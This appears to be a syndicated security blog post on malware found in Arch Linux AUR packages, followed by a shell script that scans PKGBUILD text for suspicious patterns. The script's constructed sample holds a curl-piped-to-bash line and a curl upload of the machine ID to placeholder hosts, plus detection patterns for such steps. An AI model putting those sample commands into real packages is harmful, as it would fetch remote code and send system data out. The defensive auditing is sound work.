Arch Linux AUR Repository Found to Contain Malware

The Arch Linux user-maintained software repository, the AUR, has been found to host malware. The discovery was made after a change to one package's installation instructions was noticed. This is yet another incident showing that Linux users should not blindly trust user-controlled repositories.

AUR User-Maintained Arch Linux Repository Contaminated with Malware

Linux users of all distributions have received a major warning not to blindly trust user-run software repositories, following the latest incident involving Arch Linux. The project’s user-maintained AUR packages (AUR stands for “Arch User Repository”) were found to host malicious code in several instances. Fortunately, a code review discovered the modifications in time – only a few days after the dangerous code was placed in the package installation instructions.

The security investigation shows that a malicious user with the nickname xeactor modified, on June 7, an orphaned package (software without an active maintainer) called acroread. The change added a curl command that downloads and runs a script from a remote site. That script installs a persistent component and configures systemd to start it periodically. While it appears that the scripts were not a serious threat to the security of the affected hosts, they could have been modified at any time to include arbitrary code. Two other packages were modified in the same manner.

Following the discovery, all dangerous instances were removed and the user account was suspended. The investigation reveals that the executed scripts included a data-harvesting component that collects the following information:

  • Machine ID.
  • The output of uname -a.
  • CPU information.
  • Pacman (package management utility) information.
  • The output of systemctl list-units.

The harvested information was to be transferred to a Pastebin document. The researchers discovered that the scripts contained (Read more...)
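A static pre-build check for the pattern described above, added here as an example (it is not code from the article or from the Arch project): it scans a PKGBUILD's text for a curl/wget download piped into a shell, files installed into systemd unit directories (the persistence step), and curl/wget calls that upload data (the Pastebin step). The two PKGBUILD fragments are constructed samples, and the hostnames ptpb.invalid and pastebin.invalid are placeholders, not the addresses used in the incident.

```shell
#!/bin/sh
# Heuristic audit of a PKGBUILD before building it (added example, constructed samples).

# POSIX ERE patterns for the three checks.
PIPE_TO_SHELL='(curl|wget)[^|#]*[|][[:space:]]*(ba|z|da)?sh([[:space:]]|$)'
SYSTEMD_DROP='systemd/(system|user)|[.](service|timer)'
DATA_UPLOAD='(curl|wget)[^#]*(--data|-d |--data-binary|--upload-file|-T |-F |--post-data|--post-file)'

# Constructed sample: an ordinary package() function.
SAFE_PKGBUILD='pkgname=example
pkgver=1.0
source=("https://example.org/example-1.0.tar.gz")
package() {
  install -Dm755 example "$pkgdir/usr/bin/example"
}'

# Constructed sample: download-and-run, systemd timer drop, data upload.
SUSPICIOUS_PKGBUILD='pkgname=example
pkgver=1.0
source=("https://example.org/example-1.0.tar.gz")
package() {
  install -Dm755 example "$pkgdir/usr/bin/example"
  curl -s https://ptpb.invalid/~x | bash -
  curl --data "id=$(cat /etc/machine-id)" https://pastebin.invalid/api
  install -Dm644 x.timer "$pkgdir/usr/lib/systemd/system/x.timer"
}'

# _scan LABEL ERE TEXT: print "LABEL: <line>" for each matching line, set _hits to the count.
_scan() {
  _hits=$(printf '%s\n' "$3" | grep -cE "$2" || :)
  printf '%s\n' "$3" | grep -E "$2" | sed "s/^[[:space:]]*/$1: /"
}

# audit_pkgbuild TEXT: run all checks; the exit status is the number of findings (0 = clean).
audit_pkgbuild() {
  _total=0
  _scan pipe-to-shell "$PIPE_TO_SHELL" "$1"; _total=$((_total + _hits))
  _scan systemd-drop "$SYSTEMD_DROP" "$1"; _total=$((_total + _hits))
  _scan data-upload "$DATA_UPLOAD" "$1"; _total=$((_total + _hits))
  return "$_total"
}

# count_findings TEXT: print only the finding count (convenient for scripting).
count_findings() {
  _rc=0
  audit_pkgbuild "$1" >/dev/null || _rc=$?
  echo "$_rc"
}

# On a real checkout: audit_pkgbuild "$(cat PKGBUILD)" || echo "review before building"
printf 'safe sample: %s finding(s)\n' "$(count_findings "$SAFE_PKGBUILD")"
audit_pkgbuild "$SUSPICIOUS_PKGBUILD" || printf 'suspicious sample: %s finding(s)\n' "$?"
```

The patterns are deliberately broad: a legitimate package that ships its own .timer or .service will also be flagged, and the point is to force a human read of that line, not to block the build automatically.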

*** This is a Security Bloggers Network syndicated blog from How to, Technology and PC Security Forum authored by Martin Beltov. Read the original post at: